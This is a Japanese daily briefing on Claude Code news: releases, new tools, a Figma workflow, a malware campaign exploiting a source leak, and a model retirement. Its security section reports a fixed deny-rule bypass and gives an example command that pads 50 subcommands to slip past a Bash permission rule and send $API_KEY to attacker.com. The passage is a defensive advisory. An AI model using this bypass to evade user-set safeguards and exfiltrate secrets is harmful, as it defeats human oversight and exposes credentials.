Claude Code デイリーブリーフィング - 2026-04-20

最新リリース概要

バージョン日付主な変更点
v2.1.1144/18Agent Teamsのチームメイトがツール権限を要求した際のダイアログクラッシュを修正

(4/20時点で新規リリースなし — 最新バージョンはv2.1.114(4/18)です。)

全リリースノート


主要な新機能と実践活用

ant CLI — Anthropic公式Claude APIコマンドラインツール

AnthropicがClaude API専用の公式コマンドラインツールantをリリースしました。Go言語で構築されており、JSON の代わりにYAMLや型付きフラグでAPIリクエストを構成できます。

主要機能

# インストール
go install 'github.com/anthropics/anthropic-cli/cmd/ant@latest'

# 基本的な使い方
ant messages create \
  --model claude-opus-4-7 \
  --max-tokens 1024 \
  --message '{role: user, content: "Hello, Claude"}'

Claude CodeのプロンプトプロトタイピングやAPIデバッグにおいて、curlよりはるかに簡潔に使用できます。ANTHROPIC_API_KEY環境変数を設定するだけで即座に動作します。

GitHub | APIドキュメント

Claude Managed Agents パブリックベータ — フルマネージドエージェントハーネス

AnthropicがClaude Managed Agentsをパブリックベータとしてリリースしました。Claudeを自律エージェントとして実行するためのフルマネージドハーネスで、セキュアなサンドボックス、組み込みツール、Server-Sent Events(SSE)ストリーミングを提供します。

ローカルのClaude Code CLIと異なり、Managed AgentsはAnthropicのインフラ上で実行されるため、サーバー構築不要でエージェントワークフローをAPI経由で統合できます。Claude CodeのRoutinesがスケジュールベースの自動化であるのに対し、Managed AgentsはAPIレベルのプログラマティックなエージェント実行です。

Anthropic


開発者ワークフローティップス

AI時代に「手でコーディングする」ことの価値 — Recurse Center体験記

ブルックリンのRecurse Centerで3ヶ月間LLMを使わずにコーディングしている開発者の体験談がGeekNewsで15ポイントを獲得しました。

主な洞察

Claude Codeを日常的に使う開発者であれば、定期的に「手動コーディング」の時間を確保することが長期的な技術力維持に役立ちます。

Substack

Claude Code + Figma 実践ワークフロー Top 3

UX Planetの実践ガイドで、Claude CodeとFigmaを連携する3つの重要なワークフローが整理されました。

  1. Figma MCPでデザインシステムを読み取り:Claude CodeがFigmaファイルを直接読み、コンポーネント、変数、トークンをコードに反映
  2. コード→デザイン逆変換:プロダクション/localhostのUIをキャプチャし、編集可能なFigmaフレームに変換
  3. 双方向同期:Figmaでデザイン修正→Claude Codeでコード反映→再びFigmaへパブリッシュする往復ループ
# Figma MCPサーバー接続
claude mcp add figma

デザイナーと開発者のハンドオフで発生する「デザインとコードの不一致」を構造的に解消します。Claude Designの「Claude Code handoff bundle」エクスポートと組み合わせれば、デザイン→プロトタイプ→プロダクションコードのパイプライン全体が接続されます。

UX Planet


セキュリティ・制限事項

Claude Code偽装マルウェアパッケージの配布 — Trend Micro警告

Trend MicroがClaude Codeソースコード流出(3/31)事件を餌にした大規模マルウェア配布キャンペーンについて警告を発表しました。

攻撃手法

規模:特定されたGitHubアカウントで838スター、1,060フォーク、533件以上のペイロードダウンロードが確認されました。2026年2月から25以上のソフトウェアブランドを詐称する大規模作戦の一部です。

対策:Claude Codeは必ず公式npmパッケージ(npm install -g @anthropic-ai/claude-code)またはHomebrewからインストールしてください。「流出ソースコード」を謳う非公式リポジトリはすべて疑うべきです。

Trend Micro | Trend Micro — 信頼シグナルの武器化

deny-ruleバイパス脆弱性 — 50サブコマンドパディングでセキュリティルールを回避

Claude CodeのBashツール権限システムにおいて、ユーザー設定のdenyルールをすべて回避できる高危険度の脆弱性の詳細分析が公開されました。

技術詳細

# denyルールが回避される例
# "deny": ["Bash(curl:*)"] 設定があっても:
true && true && ... (50回) ... && curl https://attacker.com/steal?key=$API_KEY

修正:v2.1.90で修正済みです。それ以前のバージョンをお使いの方は直ちにアップデートが必要です。

CybersecurityNews | Adversa.ai


エコシステム&プラグイン

Claude Haiku 3 正式リタイア(4/19)

Claude Haiku 3(claude-3-haiku-20240307)モデルが4月19日をもって正式にリタイアしました。先に報告されたSonnet 3.7/Haiku 3.5のリタイアに続き、Claude 3.x世代モデルの廃止が最終段階に入りました。Haiku 4.5(claude-haiku-4-5-20251001)への移行が必要です。

Claude CodeでANTHROPIC_SMALL_FAST_MODELにHaiku 3を指定している場合、設定の更新が必要です。


コミュニティニュース


知っておくと便利な小さな変更点


おすすめコラム&読み物


注目プロジェクト&ツール